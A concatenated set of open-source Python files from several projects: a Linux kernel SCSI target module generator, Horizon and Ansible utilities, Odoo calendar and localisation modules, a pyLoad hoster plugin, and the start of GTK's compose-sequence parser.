buf += " ret = iscsi_get_pr_transport_id(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code, buf);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *, unsigned char *);\n"
if re.search('get_pr_transport_id_len\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl,\n"
buf += " struct t10_pr_registration *pr_reg,\n"
buf += " int *format_code)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " int ret = 0;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " ret = fc_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " ret = sas_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " ret = iscsi_get_pr_transport_id_len(se_tpg, se_nacl, pr_reg,\n"
buf += " format_code);\n"
buf += " break;\n"
buf += " }\n\n"
buf += " return ret;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_pr_transport_id_len(struct se_portal_group *,\n"
bufi += " struct se_node_acl *, struct t10_pr_registration *,\n"
bufi += " int *);\n"
if re.search('parse_pr_out_transport_id\)\(', fo):
buf += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " const char *buf,\n"
buf += " u32 *out_tid_len,\n"
buf += " char **port_nexus_ptr)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + " *" + fabric_mod_port + " = tpg->" + fabric_mod_port + ";\n"
buf += " char *tid = NULL;\n\n"
buf += " switch (" + fabric_mod_port + "->" + fabric_mod_port + "_proto_id) {\n"
if proto_ident == "FC":
buf += " case SCSI_PROTOCOL_FCP:\n"
buf += " default:\n"
buf += " tid = fc_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "SAS":
buf += " case SCSI_PROTOCOL_SAS:\n"
buf += " default:\n"
buf += " tid = sas_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
elif proto_ident == "iSCSI":
buf += " case SCSI_PROTOCOL_ISCSI:\n"
buf += " default:\n"
buf += " tid = iscsi_parse_pr_out_transport_id(se_tpg, buf, out_tid_len,\n"
buf += " port_nexus_ptr);\n"
buf += " }\n\n"
buf += " return tid;\n"
buf += "}\n\n"
bufi += "char *" + fabric_mod_name + "_parse_pr_out_transport_id(struct se_portal_group *,\n"
bufi += " const char *, u32 *, char **);\n"
if re.search('alloc_fabric_acl\)\(', fo):
buf += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n\n"
buf += " nacl = kzalloc(sizeof(struct " + fabric_mod_name + "_nacl), GFP_KERNEL);\n"
buf += " if (!nacl) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_nacl\\n\");\n"
buf += " return NULL;\n"
buf += " }\n\n"
buf += " return &nacl->se_node_acl;\n"
buf += "}\n\n"
bufi += "struct se_node_acl *" + fabric_mod_name + "_alloc_fabric_acl(struct se_portal_group *);\n"
if re.search('release_fabric_acl\)\(', fo):
buf += "void " + fabric_mod_name + "_release_fabric_acl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct se_node_acl *se_nacl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_nacl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_fabric_acl(struct se_portal_group *,\n"
bufi += " struct se_node_acl *);\n"
if re.search('tpg_get_inst_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " return 1;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_tpg_get_inst_index(struct se_portal_group *);\n"
if re.search('\*release_cmd\)\(', fo):
buf += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_release_cmd(struct se_cmd *);\n"
if re.search('shutdown_session\)\(', fo):
buf += "int " + fabric_mod_name + "_shutdown_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_shutdown_session(struct se_session *);\n"
if re.search('close_session\)\(', fo):
buf += "void " + fabric_mod_name + "_close_session(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_close_session(struct se_session *);\n"
if re.search('stop_session\)\(', fo):
buf += "void " + fabric_mod_name + "_stop_session(struct se_session *se_sess, int sess_sleep , int conn_sleep)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_stop_session(struct se_session *, int, int);\n"
if re.search('fall_back_to_erl0\)\(', fo):
buf += "void " + fabric_mod_name + "_reset_nexus(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_reset_nexus(struct se_session *);\n"
if re.search('sess_logged_in\)\(', fo):
buf += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_sess_logged_in(struct se_session *);\n"
if re.search('sess_get_index\)\(', fo):
buf += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *se_sess)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_sess_get_index(struct se_session *);\n"
if re.search('write_pending\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending(struct se_cmd *);\n"
if re.search('write_pending_status\)\(', fo):
buf += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_write_pending_status(struct se_cmd *);\n"
if re.search('set_default_node_attributes\)\(', fo):
buf += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *nacl)\n"
buf += "{\n"
buf += " return;\n"
buf += "}\n\n"
bufi += "void " + fabric_mod_name + "_set_default_node_attrs(struct se_node_acl *);\n"
if re.search('get_task_tag\)\(', fo):
buf += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u32 " + fabric_mod_name + "_get_task_tag(struct se_cmd *);\n"
if re.search('get_cmd_state\)\(', fo):
buf += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_get_cmd_state(struct se_cmd *);\n"
if re.search('queue_data_in\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_data_in(struct se_cmd *);\n"
if re.search('queue_status\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_status(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_status(struct se_cmd *);\n"
if re.search('queue_tm_rsp\)\(', fo):
buf += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_queue_tm_rsp(struct se_cmd *);\n"
if re.search('get_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_get_fabric_sense_len(void);\n"
if re.search('set_fabric_sense_len\)\(', fo):
buf += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *se_cmd, u32 sense_length)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "u16 " + fabric_mod_name + "_set_fabric_sense_len(struct se_cmd *, u32);\n"
if re.search('is_state_remove\)\(', fo):
buf += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *se_cmd)\n"
buf += "{\n"
buf += " return 0;\n"
buf += "}\n\n"
bufi += "int " + fabric_mod_name + "_is_state_remove(struct se_cmd *);\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
ret = pi.write(bufi)
if ret:
tcm_mod_err("Unable to write fi: " + fi)
pi.close()
return
def tcm_mod_build_kbuild(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Makefile"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf += fabric_mod_name + "-objs := " + fabric_mod_name + "_fabric.o \\\n"
buf += " " + fabric_mod_name + "_configfs.o\n"
buf += "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name + ".o\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_build_kconfig(fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/Kconfig"
print "Writing file: " + f
p = open(f, 'w')
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "config " + fabric_mod_name.upper() + "\n"
buf += " tristate \"" + fabric_mod_name.upper() + " fabric module\"\n"
buf += " depends on TARGET_CORE && CONFIGFS_FS\n"
buf += " default n\n"
buf += " ---help---\n"
buf += " Say Y here to enable the " + fabric_mod_name.upper() + " fabric module\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
return
def tcm_mod_add_kbuild(tcm_dir, fabric_mod_name):
buf = "obj-$(CONFIG_" + fabric_mod_name.upper() + ") += " + fabric_mod_name.lower() + "/\n"
kbuild = tcm_dir + "/drivers/target/Makefile"
f = open(kbuild, 'a')
f.write(buf)
f.close()
return
def tcm_mod_add_kconfig(tcm_dir, fabric_mod_name):
buf = "source \"drivers/target/" + fabric_mod_name.lower() + "/Kconfig\"\n"
kconfig = tcm_dir + "/drivers/target/Kconfig"
f = open(kconfig, 'a')
f.write(buf)
f.close()
return
def main(modname, proto_ident):
# proto_ident = "FC"
# proto_ident = "SAS"
# proto_ident = "iSCSI"
tcm_dir = os.getcwd();
tcm_dir += "/../../"
print "tcm_dir: " + tcm_dir
fabric_mod_name = modname
fabric_mod_dir = tcm_dir + "drivers/target/" + fabric_mod_name
print "Set fabric_mod_name: " + fabric_mod_name
print "Set fabric_mod_dir: " + fabric_mod_dir
print "Using proto_ident: " + proto_ident
if proto_ident != "FC" and proto_ident != "SAS" and proto_ident != "iSCSI":
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
ret = tcm_mod_create_module_subdir(fabric_mod_dir)
if ret:
print "tcm_mod_create_module_subdir() failed because module already exists!"
sys.exit(1)
tcm_mod_build_base_includes(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_scan_fabric_ops(tcm_dir)
tcm_mod_dump_fabric_ops(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_configfs(proto_ident, fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kbuild(fabric_mod_dir, fabric_mod_name)
tcm_mod_build_kconfig(fabric_mod_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Makefile..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kbuild(tcm_dir, fabric_mod_name)
input = raw_input("Would you like to add " + fabric_mod_name + "to drivers/target/Kconfig..? [yes,no]: ")
if input == "yes" or input == "y":
tcm_mod_add_kconfig(tcm_dir, fabric_mod_name)
return
parser = optparse.OptionParser()
parser.add_option('-m', '--modulename', help='Module name', dest='modname',
action='store', nargs=1, type='string')
parser.add_option('-p', '--protoident', help='Protocol Ident', dest='protoident',
action='store', nargs=1, type='string')
(opts, args) = parser.parse_args()
mandatories = ['modname', 'protoident']
for m in mandatories:
if not opts.__dict__[m]:
print "mandatory option is missing\n"
parser.print_help()
exit(-1)
if __name__ == "__main__":
main(str(opts.modname), opts.protoident)
| gpl-2.0 |
Hodorable/0602 | horizon/utils/functions.py | 26 | 4693 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import decimal
import math
import re
from oslo_utils import units
from django.conf import settings
from django.contrib.auth import logout # noqa
from django import http
from django.utils.encoding import force_text
from django.utils.functional import lazy # noqa
from django.utils import translation
def _lazy_join(separator, strings):
return separator.join([force_text(s)
for s in strings])
lazy_join = lazy(_lazy_join, unicode)
def bytes_to_gigabytes(bytes):
# Converts the number of bytes to the next highest number of Gigabytes
# For example 5000000 (5 Meg) would return '1'
return int(math.ceil(float(bytes) / units.Gi))
def add_logout_reason(request, response, reason):
# Store the translated string in the cookie
lang = translation.get_language_from_request(request)
with translation.override(lang):
reason = unicode(reason).encode('utf-8')
response.set_cookie('logout_reason', reason, max_age=10)
def logout_with_message(request, msg, redirect=True):
"""Send HttpResponseRedirect to LOGOUT_URL.
`msg` is a message displayed on the login page after the logout, to explain
the logout reason.
"""
logout(request)
if redirect:
response = http.HttpResponseRedirect(
'%s?next=%s' % (settings.LOGOUT_URL, request.path))
else:
response = http.HttpResponseRedirect(settings.LOGOUT_URL)
add_logout_reason(request, response, msg)
return response
def get_page_size(request, default=20):
session = request.session
cookies = request.COOKIES
try:
page_size = int(session.get('horizon_pagesize',
cookies.get('horizon_pagesize',
getattr(settings,
'API_RESULT_PAGE_SIZE',
default))))
except ValueError:
page_size = session['horizon_pagesize'] = int(default)
return page_size
def get_log_length(request, default=35):
session = request.session
cookies = request.COOKIES
try:
log_length = int(session.get(
'instance_log_length',
cookies.get('instance_log_length',
getattr(settings,
'INSTANCE_LOG_LENGTH',
default))))
except ValueError:
log_length = session['instance_log_length'] = int(default)
return log_length
def natural_sort(attr):
return lambda x: [int(s) if s.isdigit() else s for s in
re.split(r'(\d+)', getattr(x, attr, x))]
def get_keys(tuple_of_tuples):
"""Processes a tuple of 2-element tuples and returns a tuple containing
first component of each tuple.
"""
return tuple([t[0] for t in tuple_of_tuples])
def value_for_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the value
corresponding to the given key. If not value is found, the key is returned.
"""
for t in tuple_of_tuples:
if t[0] == key:
return t[1]
else:
return key
def next_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the key which comes
after the given key.
"""
for i, t in enumerate(tuple_of_tuples):
if t[0] == key:
try:
return tuple_of_tuples[i + 1][0]
except IndexError:
return None
def previous_key(tuple_of_tuples, key):
"""Processes a tuple of 2-element tuples and returns the key which comes
before the given key.
"""
for i, t in enumerate(tuple_of_tuples):
if t[0] == key:
try:
return tuple_of_tuples[i - 1][0]
except IndexError:
return None
def format_value(value):
"""Returns the given value rounded to one decimal place if it is a
decimal, or integer if it is an integer.
"""
value = decimal.Decimal(str(value))
if int(value) == value:
return int(value)
return round(value, 1)
| apache-2.0 |
chacoroot/planetary | addons/calendar/controllers/main.py | 329 | 3390 | import simplejson
import openerp
import openerp.http as http
from openerp.http import request
import openerp.addons.web.controllers.main as webmain
import json
class meeting_invitation(http.Controller):
@http.route('/calendar/meeting/accept', type='http', auth="calendar")
def accept(self, db, token, action, id, **kwargs):
registry = openerp.modules.registry.RegistryManager.get(db)
attendee_pool = registry.get('calendar.attendee')
with registry.cursor() as cr:
attendee_id = attendee_pool.search(cr, openerp.SUPERUSER_ID, [('access_token', '=', token), ('state', '!=', 'accepted')])
if attendee_id:
attendee_pool.do_accept(cr, openerp.SUPERUSER_ID, attendee_id)
return self.view(db, token, action, id, view='form')
@http.route('/calendar/meeting/decline', type='http', auth="calendar")
def declined(self, db, token, action, id):
registry = openerp.modules.registry.RegistryManager.get(db)
attendee_pool = registry.get('calendar.attendee')
with registry.cursor() as cr:
attendee_id = attendee_pool.search(cr, openerp.SUPERUSER_ID, [('access_token', '=', token), ('state', '!=', 'declined')])
if attendee_id:
attendee_pool.do_decline(cr, openerp.SUPERUSER_ID, attendee_id)
return self.view(db, token, action, id, view='form')
@http.route('/calendar/meeting/view', type='http', auth="calendar")
def view(self, db, token, action, id, view='calendar'):
registry = openerp.modules.registry.RegistryManager.get(db)
meeting_pool = registry.get('calendar.event')
attendee_pool = registry.get('calendar.attendee')
partner_pool = registry.get('res.partner')
with registry.cursor() as cr:
attendee = attendee_pool.search_read(cr, openerp.SUPERUSER_ID, [('access_token', '=', token)], [])
if attendee and attendee[0] and attendee[0].get('partner_id'):
partner_id = int(attendee[0].get('partner_id')[0])
tz = partner_pool.read(cr, openerp.SUPERUSER_ID, partner_id, ['tz'])['tz']
else:
tz = False
attendee_data = meeting_pool.get_attendee(cr, openerp.SUPERUSER_ID, id, dict(tz=tz))
if attendee:
attendee_data['current_attendee'] = attendee[0]
values = dict(init="s.calendar.event('%s', '%s', '%s', '%s' , '%s');" % (db, action, id, 'form', json.dumps(attendee_data)))
return request.render('web.webclient_bootstrap', values)
# Function used, in RPC to check every 5 minutes, if notification to do for an event or not
@http.route('/calendar/notify', type='json', auth="none")
def notify(self):
registry = request.registry
uid = request.session.uid
context = request.session.context
with registry.cursor() as cr:
res = registry.get("calendar.alarm_manager").get_next_notif(cr, uid, context=context)
return res
@http.route('/calendar/notify_ack', type='json', auth="none")
def notify_ack(self, type=''):
registry = request.registry
uid = request.session.uid
context = request.session.context
with registry.cursor() as cr:
res = registry.get("res.partner")._set_calendar_last_notif_ack(cr, uid, context=context)
return res
| agpl-3.0 |
evaschalde/odoo | addons/l10n_br/__init__.py | 430 | 1403 | # -*- encoding: utf-8 -*-
###############################################################################
# #
# Copyright (C) 2009 Renato Lima - Akretion #
# #
#This program is free software: you can redistribute it and/or modify #
#it under the terms of the GNU Affero General Public License as published by #
#the Free Software Foundation, either version 3 of the License, or #
#(at your option) any later version. #
# #
#This program is distributed in the hope that it will be useful, #
#but WITHOUT ANY WARRANTY; without even the implied warranty of #
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
#GNU General Public License for more details. #
# #
#You should have received a copy of the GNU General Public License #
#along with this program. If not, see <http://www.gnu.org/licenses/>. #
###############################################################################
import account
| agpl-3.0 |
wfxiang08/ansible | lib/ansible/playbook/play.py | 10 | 11982 | # (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from six import string_types
from ansible.errors import AnsibleError, AnsibleParserError
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.playbook.base import Base
from ansible.playbook.become import Become
from ansible.playbook.block import Block
from ansible.playbook.helpers import load_list_of_blocks, load_list_of_roles
from ansible.playbook.role import Role
from ansible.playbook.taggable import Taggable
from ansible.playbook.task import Task
from ansible.utils.vars import combine_vars
__all__ = ['Play']
class Play(Base, Taggable, Become):
"""
A play is a language feature that represents a list of roles and/or
task/handler blocks to execute on a given set of hosts.
Usage:
Play.load(datastructure) -> Play
Play.something(...)
"""
# =================================================================================
# Connection-Related Attributes
# TODO: generalize connection
_accelerate = FieldAttribute(isa='bool', default=False)
_accelerate_ipv6 = FieldAttribute(isa='bool', default=False)
_accelerate_port = FieldAttribute(isa='int', default=5099) # should be alias of port
# Connection
_gather_facts = FieldAttribute(isa='bool', default=None)
_hosts = FieldAttribute(isa='list', default=[], required=True, listof=string_types)
_name = FieldAttribute(isa='string', default='')
# Variable Attributes
_vars_files = FieldAttribute(isa='list', default=[])
_vars_prompt = FieldAttribute(isa='list', default=[])
_vault_password = FieldAttribute(isa='string')
# Block (Task) Lists Attributes
_handlers = FieldAttribute(isa='list', default=[])
_pre_tasks = FieldAttribute(isa='list', default=[])
_post_tasks = FieldAttribute(isa='list', default=[])
_tasks = FieldAttribute(isa='list', default=[])
# Role Attributes
_roles = FieldAttribute(isa='list', default=[])
# Flag/Setting Attributes
_any_errors_fatal = FieldAttribute(isa='bool', default=False)
_force_handlers = FieldAttribute(isa='bool')
_max_fail_percentage = FieldAttribute(isa='string', default='0')
_serial = FieldAttribute(isa='int', default=0)
_strategy = FieldAttribute(isa='string', default='linear')
# =================================================================================
def __init__(self):
super(Play, self).__init__()
self.ROLE_CACHE = {}
def __repr__(self):
return self.get_name()
def get_name(self):
''' return the name of the Play '''
return self._attributes.get('name')
@staticmethod
def load(data, variable_manager=None, loader=None):
p = Play()
return p.load_data(data, variable_manager=variable_manager, loader=loader)
def preprocess_data(self, ds):
'''
Adjusts play datastructure to cleanup old/legacy items
'''
assert isinstance(ds, dict)
# The use of 'user' in the Play datastructure was deprecated to
# line up with the same change for Tasks, due to the fact that
# 'user' conflicted with the user module.
if 'user' in ds:
# this should never happen, but error out with a helpful message
# to the user if it does...
if 'remote_user' in ds:
raise AnsibleParserError("both 'user' and 'remote_user' are set for %s. The use of 'user' is deprecated, and should be removed" % self.get_name(), obj=ds)
ds['remote_user'] = ds['user']
del ds['user']
if 'vars_prompt' in ds and not isinstance(ds['vars_prompt'], list):
ds['vars_prompt'] = [ ds['vars_prompt'] ]
return super(Play, self).preprocess_data(ds)
def _load_hosts(self, attr, ds):
'''
Loads the hosts from the given datastructure, which might be a list
or a simple string. We also switch integers in this list back to strings,
as the YAML parser will turn things that look like numbers into numbers.
'''
if isinstance(ds, (string_types, int)):
ds = [ ds ]
if not isinstance(ds, list):
raise AnsibleParserError("'hosts' must be specified as a list or a single pattern", obj=ds)
# YAML parsing of things that look like numbers may have
# resulted in integers showing up in the list, so convert
# them back to strings to prevent problems
for idx,item in enumerate(ds):
if isinstance(item, int):
ds[idx] = "%s" % item
return ds
def _load_vars(self, attr, ds):
'''
Vars in a play can be specified either as a dictionary directly, or
as a list of dictionaries. If the later, this method will turn the
list into a single dictionary.
'''
try:
if isinstance(ds, dict):
return ds
elif isinstance(ds, list):
all_vars = dict()
for item in ds:
if not isinstance(item, dict):
raise ValueError
all_vars = combine_vars(all_vars, item)
return all_vars
elif ds is None:
return {}
else:
raise ValueError
except ValueError:
raise AnsibleParserError("Vars in a playbook must be specified as a dictionary, or a list of dictionaries", obj=ds)
def _load_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_pre_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_post_tasks(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed tasks/blocks.
Bare tasks outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, variable_manager=self._variable_manager, loader=self._loader)
def _load_handlers(self, attr, ds):
'''
Loads a list of blocks from a list which may be mixed handlers/blocks.
Bare handlers outside of a block are given an implicit block.
'''
return load_list_of_blocks(ds=ds, play=self, use_handlers=True, variable_manager=self._variable_manager, loader=self._loader)
def _load_roles(self, attr, ds):
'''
Loads and returns a list of RoleInclude objects from the datastructure
list of role definitions and creates the Role from those objects
'''
if ds is None:
ds = []
role_includes = load_list_of_roles(ds, variable_manager=self._variable_manager, loader=self._loader)
roles = []
for ri in role_includes:
roles.append(Role.load(ri, play=self))
return roles
def _post_validate_vars(self, attr, value, templar):
'''
Override post validation of vars on the play, as we don't want to
template these too early.
'''
return value
def _post_validate_vars_files(self, attr, value, templar):
'''
Override post validation of vars_files on the play, as we don't want to
template these too early.
'''
return value
# FIXME: post_validation needs to ensure that become/su/sudo have only 1 set
def _compile_roles(self):
'''
Handles the role compilation step, returning a flat list of tasks
with the lowest level dependencies first. For example, if a role R
has a dependency D1, which also has a dependency D2, the tasks from
D2 are merged first, followed by D1, and lastly by the tasks from
the parent role R last. This is done for all roles in the Play.
'''
block_list = []
if len(self.roles) > 0:
for r in self.roles:
block_list.extend(r.compile(play=self))
return block_list
def compile_roles_handlers(self):
'''
Handles the role handler compilation step, returning a flat list of Handlers
This is done for all roles in the Play.
'''
block_list = []
if len(self.roles) > 0:
for r in self.roles:
block_list.extend(r.get_handler_blocks())
return block_list
def compile(self):
'''
Compiles and returns the task list for this play, compiled from the
roles (which are themselves compiled recursively) and/or the list of
tasks specified in the play.
'''
# create a block containing a single flush handlers meta
# task, so we can be sure to run handlers at certain points
# of the playbook execution
flush_block = Block.load(
data={'meta': 'flush_handlers'},
play=self,
variable_manager=self._variable_manager,
loader=self._loader
)
block_list = []
block_list.extend(self.pre_tasks)
block_list.append(flush_block)
block_list.extend(self._compile_roles())
block_list.extend(self.tasks)
block_list.append(flush_block)
block_list.extend(self.post_tasks)
block_list.append(flush_block)
return block_list
def get_vars(self):
return self.vars.copy()
def get_vars_files(self):
return self.vars_files
def get_handlers(self):
return self.handlers[:]
def get_roles(self):
return self.roles[:]
def get_tasks(self):
tasklist = []
for task in self.pre_tasks + self.tasks + self.post_tasks:
if isinstance(task, Block):
tasklist.append(task.block + task.rescue + task.always)
else:
tasklist.append(task)
return tasklist
def serialize(self):
data = super(Play, self).serialize()
roles = []
for role in self.get_roles():
roles.append(role.serialize())
data['roles'] = roles
return data
def deserialize(self, data):
super(Play, self).deserialize(data)
if 'roles' in data:
role_data = data.get('roles', [])
roles = []
for role in role_data:
r = Role()
r.deserialize(role)
roles.append(r)
setattr(self, 'roles', roles)
del data['roles']
def copy(self):
new_me = super(Play, self).copy()
new_me.ROLE_CACHE = self.ROLE_CACHE.copy()
return new_me
| gpl-3.0 |
synweap15/pyload | module/plugins/hoster/LinksnappyCom.py | 12 | 1628 | # -*- coding: utf-8 -*-
import re
import urlparse
from module.common.json_layer import json_loads, json_dumps
from module.plugins.internal.MultiHoster import MultiHoster, create_getInfo
class LinksnappyCom(MultiHoster):
__name__ = "LinksnappyCom"
__type__ = "hoster"
__version__ = "0.11"
__status__ = "testing"
__pattern__ = r'https?://(?:[^/]+\.)?linksnappy\.com'
__config__ = [("use_premium" , "bool", "Use premium account if available" , True),
("revertfailed", "bool", "Revert to standard download if fails", True)]
__description__ = """Linksnappy.com multi-hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("stickell", "[email protected]")]
def handle_premium(self, pyfile):
host = self._get_host(pyfile.url)
json_params = json_dumps({'link' : pyfile.url,
'type' : host,
'username': self.user,
'password': self.account.get_info(self.user)['login']['password']})
r = self.load("http://linksnappy.com/api/linkgen",
post={'genLinks': json_params})
self.log_debug("JSON data: " + r)
j = json_loads(r)['links'][0]
if j['error']:
self.error(_("Error converting the link"))
pyfile.name = j['filename']
self.link = j['generated']
@staticmethod
def _get_host(url):
host = urlparse.urlsplit(url).netloc
return re.search(r'[\w-]+\.\w+$', host).group(0)
getInfo = create_getInfo(LinksnappyCom)
| gpl-3.0 |
GladeRom/android_external_chromium_org | third_party/gtk+/gtk/compose-parse.py | 149 | 34346 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# compose-parse.py, version 1.3
#
# multifunction script that helps manage the compose sequence table in GTK+ (gtk/gtkimcontextsimple.c)
# the script produces statistics and information about the whole process, run with --help for more.
#
# You may need to switch your python installation to utf-8, if you get 'ascii' codec errors.
#
# Complain to Simos Xenitellis ([email protected], http://simos.info/blog) for this craft.
from re import findall, match, split, sub
from string import atoi
from unicodedata import normalize
